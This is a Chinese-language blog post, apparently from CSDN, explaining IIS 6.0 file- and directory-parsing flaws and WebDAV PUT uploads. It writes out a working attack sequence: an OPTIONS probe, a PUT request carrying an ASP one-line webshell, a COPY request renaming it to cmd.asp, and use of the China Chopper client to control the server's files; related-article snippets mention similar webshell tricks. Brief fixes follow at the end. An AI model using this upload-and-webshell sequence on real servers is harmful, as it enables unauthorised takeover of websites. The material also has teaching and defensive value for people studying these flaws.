IIS6.0解析漏洞

最新推荐文章于 2023-05-07 00:17:27 发布
最新推荐文章于 2023-05-07 00:17:27 发布
阅读量3.9k 收藏 10
点赞数 5
分类专栏: iss 解析漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42299610/article/details/104864750
版权

ISS6.0解析漏洞介绍
(1) 当建立*.asa、.asp格式的文件夹时,其目录下的任意文件都将被IIS当作为asp文件解析。
(2) 当文件.asp;*.jpg IIS6.0同样会将文件当做asp文件解析。
注:微软目前也没有推出补丁,不认为是一个漏洞

ISS6.0 PUT上传原理
WeDAV基于HTTP1.1协议的通信协议使得HTTP支持PUT MOVE COPY DELETE方法。
1.在kali利用nikto探测URL通信协议情况。
在这里插入图片描述
2.探测是否存在PUT漏洞:
OPTIONS /HTTP1.1
Host:www.xxx.com

在这里插入图片描述
3.上传txt文本文件
PUT /*.txt HTTP1.1
Host:www.xxx.com
Content-Length:30

<%eval request(“shezhang”)%>

在这里插入图片描述
4.通过Move或Copy重名
COPY /*.txt HTTP1.1
Host:www.xxx.com
Destination:
http://www.xxx.com/cmd.asp

在这里插入图片描述
IIS6.0 PU上传利用
使用中国菜刀,连接目录中上传的木马文件,操作站点系统中的文件。
在这里插入图片描述
在这里插入图片描述
Iss6.0默认的可执行文件
除了asp还包括这三种:
/test.asa(<%=now()%>)
/test.cer
/test.cdx
在这里插入图片描述
Iss6.0解析配置
在这里插入图片描述

IIS6.0的修复方案
1.目前尚无微软官方的补丁,可以通过编写正则,阻止上传xx.asp;.jpg类型的文件名

2.做好权限设置,限制用户创建文件夹

weixin_42299610
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
IIS6.0文件解析漏洞
龙狼刺的博客
05-11 6236
目录 一、相关知识 1、IIS6.0解析漏洞介绍 2、IIS6.0PUT上传原理 3、IIS6.0解析文件类型 4、IIS6.0文件解析漏洞修复方案 二、环境配置 三、文件上传 1、设置代理 2、靶机环境配置 3、截取数据包 4、探测漏洞 5、创建文件,并写入一句话木马 6、复制文件并重命名,绕过拦截 四、蚁剑连接 一、相关知识 1、IIS6.0解析漏洞介绍 (1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。...
IIS6.0漏洞解析漏洞复现及防御——文件解析、目录解析
7Riven's blog
12-06 4155
漏洞成因 IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。一般配合服务器的文件上传功能使用,以获取服务器的权限。 IIS6.0在网站下对创建目录格式没有做严格的过滤限制措施,导致目录解析漏洞漏洞类型 文件解析漏洞、目录解析漏洞 漏洞细节 验证有哪些文件格式被IIS6.0当做asp格式执行? 从上述测试结果来看,IIS6.0下可...
文件上传之IIS6.0解析漏洞
一个普普通通的博客
03-15 4277
iis6.0解析漏洞
IIS6.0文件解析漏洞–特殊符号“/“ && IIS6.0文件解析漏洞–特殊符号“;“
m0_73720136的博客
05-07 458
掌握利用IIS6.0文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用IIS6.0文件解析漏洞,绕过白名单限制,解析脚本文件。
中间件解析漏洞 - IIS6.0
qq_49433473的博客
05-18 1854
中间件解析漏洞 - IIS6.0 —(文件上传之IIS6.0解析漏洞
IIS解析漏洞
cyynid的博客
02-28 930
在开启WebDav扩展的服务器后,如果支持PUT、Move、Copy、Delete等方法,就可能会存在一些安全隐患,比如www.secbug.org服务器(IIS 6.0 Web容器)支持WebDav,并且存在PUT、Move、Copy、Delete等方法,那么攻击者就可能通过PUT方法向服务器上传危险脚本文件,测试步骤如下。例如:建立文件夹 parsing.asp,在 parsing.asp 文件夹内新建一个文本文档 test.txt,其内容为,然后在浏览器内访问。
IIS6.0解析漏洞及修复-01
09-15
IIS6.0解析漏洞及修复-01 IIS6.0解析漏洞及修复是Web安全训练营的重要一课,今天我们来讨论IIS6.0解析文件类型和修复方案。 IIS6.0解析文件类型 IIS6.0解析文件类型是指IIS6.0服务器如何处理不同的文件类型。...
29.文件上传漏洞IIS6.0解析漏洞及防御原理(二)1
08-03
文件上传漏洞IIS6.0解析漏洞及防御原理(二)1 在网络安全领域,文件上传漏洞和服务器解析漏洞是常见的攻击手段,这篇文章将深入探讨这两个主题,并提供防御策略。 一. 文件上传漏洞之扩展名限制 1. PHP345文件...
IIS_6.0文件解析漏洞及解决办法
04-07
IIS 6.0 文件解析漏洞及解决办法 IIS 6.0 文件解析漏洞是指在 IIS 6.0 中的一个安全漏洞,该漏洞允许攻击者上传恶意文件并执行恶意代码,从而获得网站的控制权。该漏洞是由于 IIS 6.0 在处理文件夹扩展名时的错误...
第一节 中间件解析漏洞-IIS6.0-01
最新发布
09-15
IIS6.0解析漏洞 IIS6.0中间件解析漏洞是指在IIS6.0服务器中,因其解析机制存在漏洞,导致攻击者可以上传恶意文件。该漏洞存在于IIS6.0服务器的解析机制中,当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都...
FCKeditor上传漏洞IIS6解析漏洞的利用和修补
03-18
FCKeditor上传漏洞IIS6解析漏洞的利用和修补
IIS6.0最最完整版
05-02
IIS 6.0 全面解析IIS(Internet Information Services)是微软公司推出的一款Web服务器应用程序,主要用于提供HTTP、FTP、SMTP和NNTP等网络服务。IIS 6.0作为其第六个主要版本,发布于2003年,与Windows ...
IIS6目录解析漏洞的实验
CuiXY's Blog
11-10 860
​​​​​​​​​​Windows 打开IIS管理器的方式 这个是网站IIS网站目录 右击默认网站中的属性,可以查看网站的属性,比如网站根目录,或者是端口 这个是网站的目录C:\www,有三个文件分别是file文件夹,index.asp,upload.asp。其中 Index.asp是上传文件的地方,upload.asp是处理上传文件,最后一个file文件夹是存放 上传文件目录的地方 In...
文件解析漏洞小结
ZIP123Y的博客
10-31 224
前言 0x00 文件解析漏洞主要由于网站管理员操作不当或者 Web 服务器自身的漏洞,导致一些特殊文件被 IIS、apache、nginx 或其他 Web服务器在某种情况下解释成脚本文件执行。从而导致解析漏洞的出现 IIS解析漏洞 1:目录解析(6.0),当一个目录后缀asp或asa时,此目录所有文件都会被当作asp脚本文件执行 IIS6.0默认可执行文件还包括 xxx.asa xxx.cer xxx.cdx三种 2:文件名解析 xxx.asp;.jpg也会被当作a...
IIS6.0容器之解析漏洞复现
Louisnie
10-30 7423
漏洞简介 解析漏洞是指web服务器因对HTTP请求处理不当导致将非可执行的脚本,文件等当作可执行的脚本去执行.该漏洞一般配合web容器(iis,nginx,apache,tomcat等)的文件上传功能去使用,以获取服务器的权限. IIS5.X/6.X解析漏洞 对于IIS服务器5版本和6版本存在两个解析漏洞,分别为目录解析和文件解析 目录解析 简介:在网站下建立文件夹的名称中以.asp或.asa等作...
渗透记录——iis7.5漏洞没有iis6的解析漏洞
热门推荐
baidu_33260220的博客
09-18 1万+
拿到一个后台,刚开始不让传马,apsx伪装成jpg,提示安全错误,含有html编码,看来必须要用正常图片。于是找了小图片,用copy /b d:\aa.jpg+d:\xiaoma.aspx  luo2.jpg  ,如图 合成了一个含马的正常图片(注意顺序:图片+马是修改文件头,马+图片是修改图片尾)直接修改了文件头,发现可以上传。开心呀,于是就花式作死,各种尝试改后缀……
IIS解析漏洞终极解决方案
积木网络
12-15 1870
积木网络什么是“IIS解析漏洞”? 在 Windows 2003 IIS 6.0 下有两个漏洞,微软一直没有给出补丁。     漏洞1:     在网站下建立文件夹的名字为 *.asp、*.asa 的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。例如创建目录 vidun.asp,那么 /vidun.asp/1.jpg 将被当作 asp 文件来执行。
初窥渗透--IIS6.0解析漏洞
happy_dw的专栏
07-23 5540
学渗透一定要动手操作,一个简单的动作重复N遍以上就能学会了。     最近在学习一句话木马的使用,加上中国菜刀,真是个居家旅行的必备技能。举例说asp的一句话: a就是连接密码了。(一定要写对chr(97),我看着书写char(97)被坑了一下午...还以为是服务器设置问题)。但是今天我练习的时候遇到了只能上传图片的漏洞,然后就去网上找姿势,就学习了IIS6.0解析漏洞了。 我
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

weixin_42299610

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值